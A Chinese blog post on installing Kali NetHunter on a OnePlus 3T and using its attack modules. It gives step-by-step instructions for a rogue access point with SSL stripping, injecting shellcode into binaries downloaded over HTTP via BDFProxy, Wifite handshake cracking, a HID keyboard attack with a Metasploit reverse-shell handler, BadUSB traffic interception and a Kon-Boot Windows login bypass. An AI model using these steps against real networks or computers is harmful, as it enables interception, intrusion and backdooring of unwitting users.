Finger
一只孤独的代码狗/程序猿/攻城狮

说实话,我对nethunter并无感觉,但是没办法,上头的一些安排,我还是得做的;

先说下前置工作吧:

1.已经有烧录好的badusb

2.刚到的大菠萝一个(之后会单独讲)nano

3.type-c OTG线一根

4.测试手机一加3T一台&数据线一根

5.TP-Link TL-WN822N 外置无线网卡

刷入nethunter流程:

流程一:新手机→刷入TWRP→刷入系统文件→ROOT/supersu授权

流程二:旧手机(其他系统)→刷回CM或者H2 O2系统

首先开始操一加手机了:

刷机不是很难,如果是刚买的一加手机,直接可以刷,但是我这个不是....被人操了一段时间的了,刷了个什么傻逼系统进去。好像是小米(人和人的审美还真是相差巨大啊)

这是我准备的一些东西,有些重复下载了,我简单说下

CM刷机包,H2os O2os nethunter内核和包(两个)一加刷机工具箱和万能工具包(工具箱是刷机比较好用,万能工具包是成砖的时候线刷回原系统..)TWRP

(工具截图)

下面是链接nethunter的下载链接

每夜版的 https://build.nethunter.com/nightly/  直接index of的,找合适版本下载即可。

前面带着kernel 是nethunter的内核,

这个nethunter-generic 是包,主要是看你处理器的版本 现在一般什么一加三都是amd64的,update那个是升级包。

https://build.nethunter.com/nightly/2017.10-20171013-0449/

还有一加原系统,这个我忘记是在哪里下载的了 如果需要,直接找我,我私发就行了。

接下来就是刷机前的准备

电量:60%以上

备份:老夫不需要备份

USB调试模式

OEM解锁

高级重启

 

如图所示:

下面装twrp和root ,如果有那个一加工具箱,就不用按照网上的教程做了,

装好驱动,打开这个一加xx工具箱,直接插入手机,选择12,直接装好了twrp和root...

接下来就简单了,(不用双清不用做其他操作)先刷内核 就是之前那个kernel-xxxx那个 ,再刷入nethunter-generic-xxx这个。。

刷完之后,直接开机,先打开supersu ,给到授权nethunter 和终端。。。完事~

装是装好了,但是这样子的有啥用啊。那肯定没啥用。

首先是调试下功能,一个一个来:

一需要注册的或者api的

比如zanti和shodan ,shodan在电脑注册申请api再填入api即可,zanti一般来说要找破解版的。但是也需要登陆账号,那就百度一下,官网,挂上VPN,翻q之后注册,一切nothing~~

二RF analyzer 

这个东西要配合硬件,我上头给我要求没有要求近场通信NFC这块的,但是我推荐使用本身一加手机自带的NFC,配合一个MIfare tools的apk(需要自己装)这个东西呢只能玩玩卡片,还只是M1 未全加密的卡,如果你们需要拓展,可以来问我怎么玩和配置pm3。

三 wifi/无线功能

首先需要网卡/大菠萝等外置设备,然后是应用,大菠萝的话,是直接在nethunter菜单左侧直接有控制端,网卡的话,需要配合上自带或者你自己装的应用了。自己装的应用可以有 lanmitm、Network Spoofer、Intercepter-NG 等等

Mana evilAP 

我这就讲下,dsploit 这个app,那就不用讲了,一堆骚操作,讲下 mana evilap这个东西吧。Mana蜜罐采用与PineApple相同的:Hostapd的Karma补丁,可用来欺骗接入无线网络用户,使其可很平滑连接到虚假AP中,进行后续攻击.
需要说明的是,NetHunter无线攻击模块,大都需要使用OTG外接USB无线网卡.主流芯片(可以试试Kali是否可直接识别)网卡均可.WN722N较为推荐,迷你的EDUP网卡通用性则较强(Raspberry Pi也可直接识别),

使用操作也不是很难 ,都是一些常用配置,直接通过左侧的mana配置页面,进去,就能看到Hostapd配置文件、DHCP服务配置文件和DNS欺骗配置文件,服务启动脚本有多个,均可自由编辑修改:

比如说start-nat-full.sh,脚本需要USB无线网卡(存在上行流量)启动,无线连入为NAT模式,并启动所有脚本包括:firelamb,sslstrip,sslsplit等,截获流量并保存.
还有start-nat-simple.sh同样有上行流量,但并不启动firelamb,sslstrip,sslsplit等脚本.
还有start-nat-simple-bdf.sh,加入了BDF恶意代码Inject工具,后面章节将对其攻击思路进行介绍.
此外,还有start-noupstream.sh
Mana作为无法上网的虚假AP启动,但可吸引WIFI默认开启的终端自动连接并抓取信息.
start-noupstream-eap.sh
Mana同样无法上网,但会进行EAP攻击
编辑好启动文件后,Start Attack,会弹窗勾选启动脚本:
即可启动服务.

Backdooring Executable Over HTTP

github项目the-backdoor-factory和BDFProxy,可让我们轻松地对使用HTTP协议传送的二进制文件注入shellcode.
首先建立一个Mana蜜罐,SSID这里使用默认名称internet,启动服务
cd /usr/share/mana-toolkit/run-mana
./start-nat-simple-bdf.sh
再开一个Shell,编辑bdfproxy.cfg,此配置文件包含了针对不同平台默认设置的payload,可自行更换.不过由于显示问题,用nano编辑文本会一行行刷新,还是换个方式编辑比较好.这里只把IP修改192.168.1.151,也可在Nethunter的主面板下的MANA Evil Access Point中进行配置.
nano /etc/bdfproxy/bdfproxy.cfg
配置好IP之后,在Shell中直接输入bdfproxy运行之.
再新开一个Shell启动Metasploit
一切准备就绪,等待连入蜜罐AP的PC机上网下载二进制文件
运行下载的软件,因为注入了payload,会出现自校验失败的提示
查看MSF,已成功反弹回Shell了.

WIFITE破解
连接好外置无线网卡后,在Nethunter主菜单选择Launch Wifite即可进入
选择开启混杂监听模式的网卡,选择Wlan1
扫描开始,每5秒更新一次,当确认攻击目标后CTRL+C停止扫描
输入攻击目标序号,这里就选XDSEC-WIFI了,输入2
抓包成功后自动调用字典破解,这里机智的把字典删掉,其自动退出
抓到的握手包存放在/data/local/kali-armhf/HS目录下,命名规则是SSID+MAC
如果目标开启WPS,则自动进行PIN码破解.
Wifite相对傻瓜化,易操作,适合移动终端.连入无线后结合zANTI等工具调戏即可

四其他玩法

HID KeyBoard Attack

USB HID可通过模拟键盘或鼠标操作,实时执行目标代码,在此以PowerSploit结合MSF为例:
首先运行提供payload的webserver,在Kali Service Control中开启Apache服务器
转到HID攻击配置页面,选择PowerSploit
IP和端口填写MSF监听的IP端口,Payload我们选择windows/meterpreter/reverse_https,URL为提供Apache服务的IP,
配置好后UPDATE配置文件,接下来需配置MSF监听反弹shell
root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) >
payload同HID配置页面中的payload
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
IP和端口同样设置
msf exploit(handler) > msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4444
LPORT => 443
msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
至此配置OK
开始监听
此时将设备连接至PC机,等待设备被识别后,执行Execute,攻击开始.
POWERSHELL命令执行后,就可在msf中看到反弹的shell了:
如连上PC后没有反应,可按Reset USB键更新.
当然,HID KeyBoard Attack也提供了Windows CMD攻击模块,即连入计算机后自动打开CMD并执行指定命令(默认为添加新管理员用户,可自由定制).

BadUSB MITM Attack

首先,确保手机连接目标计算机时,MTP文件传输是关闭的.连接目标计算机,打开手机USB网络共享:
此时在NetHunter Home打开一个Kali Shell,查看网卡多出虚拟网卡rndis0(USB网络共享网卡).
此时可以开启Tcpdump截获流量,命令如:
tcpdump -i rndis0
回到NetHunter Home,切换到BadUSB MiTM Attack,勾选右上角选项Start BadUSB Attack
被连接的计算机此时会多出一个网卡,网关为rndis0的IP地址
此时流量已可以截获
(双网关劫持失败:出现双网关现在所以并未像官网演示的那样流量直接走向恶意网关(10.0.0.1)而是依旧走的之前的网关(192.168.1.1)故劫持失败
这种情况也可能出现,不过个人测试中,网络连接优先级,默认劫持后的网关优先级更高,故流量可以正常劫持.)

绕过Windows登录认证

借助DriveDroid实现Windows登陆绕过密码.
DriveDroid本是个允许通过安卓手机中的ISO/镜像文件引导启动PC机的一个App,但结合了特定的镜像,实现绕过Windows登陆认证就变得可行:)
在此以Win7为例,首先为默认账户创建密码hello.
DriveDroid默认引导镜像存放目录位于SDCard/Download/images,只需将欲引导的镜像存放于此目录即可.
选择Kon-Boot.镜像挂载,模式这里选择为Read-Only USB
加载成功后相应镜像有所标志
而在连入的PC机中也会显示加载有新的可移动磁盘(或软驱盘),如未能显示,可在配置页面进行相应调整(可通过USB Setup Wizard向导指引)
此时在设有密码的PC机重启,进入BIOS设置启动项
如果镜像加载成功,之后登陆用户密码处回车即可绕过密码认证登陆系统
需要说明的是,通过此方式登陆系统无法直接修改或删除系统密码.

这篇文章有2人发言了呢.

  1. 我想请您一个事,有一加原系统,这个我忘记是在哪里下载的了 如果需要,直接找我,我私发就行了 我要一加原系统 我是一加3T 还有我刷了kali nethunter系统WiFi无法打开 是哪儿有问题吗?k可以方便加您联系方式请教吗?可以有偿!谢谢

    杨亦辰

    2018/5/22

    @Ta
    #1
    • @

      杨亦辰

      wifi打不开 应该是内核没刷吧。微信&qq :229686485

      finger 扁担w

      2018/6/10

      @Ta

发表评论